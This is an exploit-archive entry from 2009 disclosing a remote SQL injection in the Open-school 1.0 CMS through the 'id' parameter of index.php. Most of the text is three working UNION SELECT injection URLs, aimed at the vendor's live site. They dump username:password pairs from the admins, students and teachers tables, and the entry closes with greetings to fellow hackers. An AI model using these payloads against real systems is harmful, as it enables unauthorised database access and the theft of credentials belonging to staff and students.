[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Open-school 1.0 (id) Remote SQL Injection Vulnerability
# Published : 2009-06-01
# Author : OzX
# Previous Title : eliteCMS 1.01 (SQL/XSS) Multiple Remote Vulnerabilities
# Next Title : Escon SupportPortal Pro 3.0 (tid) Blind SQL Injection Vulnerability


Cms : Open-school
Version : 1.0
Archivo : Index.php
Parametro : id
Sitio :http://open-school.org
Url Vulnz :http://site.com/index.php?module=os_news&view=show&id=[SQLI]

Demo Injection:

Admin (User,Pass):
http://open-school.org/index.php?module=os_news&view=show&id=3+and+1=0+union+select+all+1,group_concat(username,0x3A,password),3,4,5,6,7,8,9,10+from+admins

Students (User,Pass):
http://open-school.org/index.php?module=os_news&view=show&id=3+and+1=0+union+select+all+1,group_concat(username,0x3A,password),3,4,5,6,7,8,9,10+from+students

Teachers (User,Pass):
http://open-school.org/index.php?module=os_news&view=show&id=3+and+1=0+union+select+all+1,group_concat(username,0x3A,password),3,4,5,6,7,8,9,10+from+teachers

Gretz :
C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net. 

# www.Syue.com [2009-06-01]